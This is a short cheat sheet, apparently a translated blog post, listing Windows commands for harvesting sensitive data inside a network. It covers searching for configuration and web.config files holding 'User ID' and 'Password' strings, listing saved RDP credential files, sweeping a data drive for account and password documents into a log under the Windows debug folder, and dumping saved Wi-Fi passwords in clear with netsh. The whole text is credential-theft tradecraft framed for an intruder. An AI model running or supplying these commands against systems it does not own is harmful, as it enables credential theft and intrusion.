Collect sensitive documents within the network

Conf file recursive search path has characters: dir /a /s /b "网站目录\*conf*" > 1.txt
recursive search web.config file in the current directory: dir /b /s web.config
recursive search web.config file in the current directory string with a "User ID =" or "Password =" file path: findstr /c:"User ID=" /c:"Password=" /si web.config
Find rdp certificate file: dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
recursive lookups D: sensitive files in the / Data / directory for /r D:/Data/ %i in (*account.docx,*pwd*.docx,*login*.docx,*login*.xls) do @echo %i >> c:/windows/debug/result.txt
view the current system has saved the name of the wireless netsh wlan show profiles
check the specified wireless connection passwordnetsh wlan show profile name="Tenda_48A460" key=clear

Guess you like

Origin www.cnblogs.com/zpchcbd/p/11693991.html